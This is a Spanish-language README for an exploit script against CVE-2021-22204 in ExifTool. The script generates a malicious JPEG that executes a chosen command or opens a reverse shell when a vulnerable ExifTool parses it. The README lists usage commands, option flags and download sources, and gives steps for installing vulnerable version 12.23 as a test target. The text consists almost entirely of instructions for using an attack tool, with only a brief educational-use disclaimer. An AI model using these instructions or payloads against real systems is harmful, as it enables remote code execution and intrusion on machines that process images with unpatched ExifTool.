
Exploit para CVE-2021-22204 (ExifTool) - Ejecución de Código Arbitrario

¿Te gusta este repositorio? ¡Dale una ⭐!
Solo con fines educativos y de investigación de seguridad autorizada.
@UNICORDev por (@NicPWNs y @Dev-Yeoj)
La neutralización incorrecta de datos de usuario en el formato de archivo DjVu en ExifTool versiones 7.44 en adelante permite la ejecución arbitraria de código al analizar la imagen maliciosa.
Utiliza este exploit para generar un payload de imagen JPEG que puede ser usado con una versión vulnerable de ExifTool para ejecución de código. Se puede proporcionar un comando personalizado o generar una shell inversa. Se genera automáticamente una imagen JPEG y, opcionalmente, se puede suministrar una imagen JPEG personalizada para insertar el payload.
python3 exploit-CVE-2021-22204.py -c <comando>
python3 exploit-CVE-2021-22204.py -s <IP-local> <puerto-local>
python3 exploit-CVE-2021-22204.py -c <comando> [-i <imagen.jpg>]
python3 exploit-CVE-2021-22204.py -s <IP-local> <puerto-local> [-i <imagen.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Modo de comando personalizado. Proporciona el comando a ejecutar.
-s Modo de shell inversa. Proporciona IP y puerto local.
-i Ruta a una imagen JPEG personalizada. (Opcional)
-h Muestra este menú de ayuda.
Descargar exploit-CVE-2021-22204.py desde GitHub
Descargar exploit-CVE-2021-22204.py desde ExploitDB
searchsploit -u
searchsploit -m 50911

Exiftool Versión 12.23
Exiftool Versiones 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg